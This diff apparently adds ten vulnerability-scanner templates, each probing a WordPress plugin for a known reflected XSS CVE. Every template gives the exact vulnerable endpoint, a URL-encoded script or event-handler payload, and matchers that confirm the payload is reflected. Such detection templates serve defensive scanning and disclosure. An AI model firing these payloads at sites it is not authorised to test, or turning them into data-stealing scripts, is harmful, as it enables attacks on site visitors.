New merged templates

CVE-2017-17043.yaml

@@ -0,0 +1,30 @@
+id: CVE-2017-17043
+
+info:
+  name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043
+  tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>alert(123)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2017-17059.yaml

@@ -0,0 +1,34 @@
+id: CVE-2017-17059
+
+info:
+  name: amtyThumb posts 8.1.3 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.
+  reference: |
+    - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-17059
+  tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1"
+
+    body: "amty_hidden=1"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>alert(123)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2017-17451.yaml

@@ -0,0 +1,30 @@
+id: CVE-2017-17451
+
+info:
+  name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451
+  tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>alert(123)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2017-18536.yaml

@@ -0,0 +1,30 @@
+id: CVE-2017-18536
+
+info:
+  name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
+  reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501
+  tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<img src=x onerror=javascript:prompt(123)>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2017-9288.yaml

@@ -0,0 +1,30 @@
+id: CVE-2017-9288
+
+info:
+  name: Raygun4WP <= 1.8.0 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter).
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288
+  tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<img src=x onerror=alert(123)>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2018-11709.yaml

@@ -0,0 +1,30 @@
+id: CVE-2018-11709
+
+info:
+  name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709
+  tags: cve,cve2018,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>alert(123)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2018-20462.yaml

@@ -0,0 +1,30 @@
+id: CVE-2018-20462
+
+info:
+  name: JSmol2WP <= 1.07 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462
+  tags: cve,cve2018,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>alert(123)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2018-5316.yaml

@@ -0,0 +1,30 @@
+id: CVE-2018-5316
+
+info:
+  name: SagePay Server Gateway for WooCommerce <= 1.0.8 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5316
+  tags: cve,cve2018,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>alert(123)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2019-15713.yaml

@@ -0,0 +1,32 @@
+id: CVE-2019-15713
+
+info:
+  name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
+  reference: |
+    - https://wpscan.com/vulnerability/9267
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-15713
+  tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<svg/onload=confirm(123)>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2019-16332.yaml

@@ -0,0 +1,30 @@
+id: CVE-2019-16332
+
+info:
+  name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332
+  tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3Cscript%3Ealert%28123%29%3C/script%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>alert(123)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200